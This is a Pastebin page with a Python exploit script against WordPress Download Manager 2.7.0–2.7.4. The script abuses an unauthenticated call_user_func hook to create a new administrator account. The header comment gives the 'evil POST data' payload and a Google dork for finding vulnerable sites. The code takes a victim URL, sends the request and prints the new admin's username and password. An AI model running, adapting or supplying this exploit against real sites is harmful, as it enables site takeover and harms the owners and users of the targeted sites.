SHARE
TWEET

rce

a guest Jun 11th, 2019 137 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. #
  3. # Exploit Name: Wordpress Download Manager 2.7.0-2.7.4 Remote Command Execution
  4. #
  5. # Vulnerability discovered by SUCURI TEAM (http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html)
  6. #
  7. # Exploit written by Claudio Viviani
  8. #
  9. #
  10. # 2014-12-03:  Discovered vulnerability
  11. # 2014-12-04:  Patch released (2.7.5)
  12. #
  13. # Video Demo: https://www.youtube.com/watch?v=rIhF03ixXFk
  14. #
  15. # --------------------------------------------------------------------
  16. #
  17. # The vulnerable function is located on "/download-manager/wpdm-core.php" file:
  18. #
  19. # function wpdm_ajax_call_exec()
  20. # {
  21. #    if (isset($_POST['action']) && $_POST['action'] == 'wpdm_ajax_call') {
  22. #         if (function_exists($_POST['execute']))
  23. #             call_user_func($_POST['execute'], $_POST);
  24. #         else
  25. #             echo "function not defined!";
  26. #         die();
  27. #     }
  28. # }
  29. #
  30. # Any user from any post/page can call wpdm_ajax_call_exec() function (wp hook).
  31. # wpdm_ajax_call_exec() call functions by call_user_func() through POST data:
  32. #
  33. #         if (function_exists($_POST['execute']))
  34. #             call_user_func($_POST['execute'], $_POST);
  35. #         else
  36. #         ...
  37. #         ...
  38. #         ...
  39. #
  40. # $_POST data needs to be an array
  41. #
  42. #
  43. # The wordpress function wp_insert_user is perfect:
  44. #
  45. # http://codex.wordpress.org/Function_Reference/wp_insert_user
  46. #
  47. # Description
  48. #
  49. # Insert a user into the database.
  50. #
  51. # Usage
  52. #
  53. # <?php wp_insert_user( $userdata ); ?>
  54. #
  55. # Parameters
  56. #
  57. # $userdata
  58. #     (mixed) (required) An array of user data, stdClass or WP_User object.
  59. #        Default: None
  60. #
  61. #
  62. #
  63. # Evil POST Data (Add new Wordpress Administrator):
  64. #
  65. # action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator
  66. #
  67. # ---------------------------------------------------------------------
  68. #
  69. # Dork google:  index of "wordpress-download"
  70. #
  71. # Tested on Wordpress Download Manager from 2.7.0 to 2.7.4 version with BackBox 3.x and python 2.6
  72. #
  73. # Http connection
  74. import urllib, urllib2, socket
  75. #
  76. import sys
  77. # String manipulator
  78. import string, random
  79. # Args management
  80. import optparse
  81.  
  82. # Check url
  83. def checkurl(url):
  84.     if url[:8] != "https://" and url[:7] != "http://":
  85.         print('[X] You must insert http:// or https:// procotol')
  86.         sys.exit(1)
  87.     else:
  88.         return url
  89.  
  90. # Check if file exists and has readable
  91. def checkfile(file):
  92.     if not os.path.isfile(file) and not os.access(file, os.R_OK):
  93.         print '[X] '+file+' file is missing or not readable'
  94.         sys.exit(1)
  95.     else:
  96.         return file
  97.  
  98. def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
  99.     return ''.join(random.choice(chars) for _ in range(size))
  100.  
  101. banner = """
  102.    ___ ___               __
  103.   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
  104.   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
  105.   |. / \ |_____|__| |_____|   __|__| |_____|_____|_____|
  106.   |:      |    ______      |__|              __                __
  107.   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
  108.   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
  109.               |.  |    |_____|________|__|__|__|_____|___._|_____|
  110.               |:  1    /   ___ ___
  111.               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.
  112.               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|
  113.                           |. \_/  |___._|__|__|___._|___  |_____|__|
  114.                           |:  |   |                 |_____|
  115.                           |::.|:. |
  116.                           `--- ---'
  117.                                                   Wordpress Download Manager
  118.                                                      R3m0t3 C0d3 Ex3cut10n
  119.                                                         (Add WP Admin)
  120.                                                          v2.7.0-2.7.4
  121.  
  122.                               Written by:
  123.  
  124.                             Claudio Viviani
  125.  
  126.                          http://www.homelab.it
  127.  
  128.                             info@homelab.it
  129.                         homelabit@protonmail.ch
  130.  
  131.                   https://www.facebook.com/homelabit
  132.                      https://twitter.com/homelabit
  133.                    https://plus.google.com/+HomelabIt1/
  134.           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  135. """
  136.  
  137. commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
  138. commandList.add_option('-t', '--target', action="store",
  139.                   help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  140.                   )
  141. commandList.add_option('--timeout', action="store", default=10, type="int",
  142.                   help="[Timeout Value] - Default 10",
  143.                   )
  144.  
  145. options, remainder = commandList.parse_args()
  146.  
  147. # Check args
  148. if not options.target:
  149.     print(banner)
  150.     commandList.print_help()
  151.     sys.exit(1)
  152.  
  153. host = checkurl(options.target)
  154. timeout = options.timeout
  155.  
  156. print(banner)
  157.  
  158. socket.setdefaulttimeout(timeout)
  159.  
  160. username = id_generator()
  161. pwd = id_generator()
  162.  
  163. body = urllib.urlencode({'action' : 'wpdm_ajax_call',
  164.                          'execute' : 'wp_insert_user',
  165.                          'user_login' : username,
  166.                          'user_pass' : pwd,
  167.                          'role' : 'administrator'})
  168.  
  169. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
  170.  
  171. print "[+] Tryng to connect to: "+host
  172. try:
  173.     req = urllib2.Request(host+"/", body, headers)
  174.     response = urllib2.urlopen(req)
  175.     html = response.read()
  176.  
  177.     if html == "":
  178.        print("[!] Account Added")
  179.        print("[!] Location: "+host+"/wp-login.php")
  180.        print("[!] Username: "+username)
  181.        print("[!] Password: "+pwd)
  182.     else:
  183.        print("[X] Exploitation Failed :(")
  184.  
  185. except urllib2.HTTPError as e:
  186.     print("[X] "+str(e))
  187. except urllib2.URLError as e:
  188.     print("[X] Connection Error: "+str(e))
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top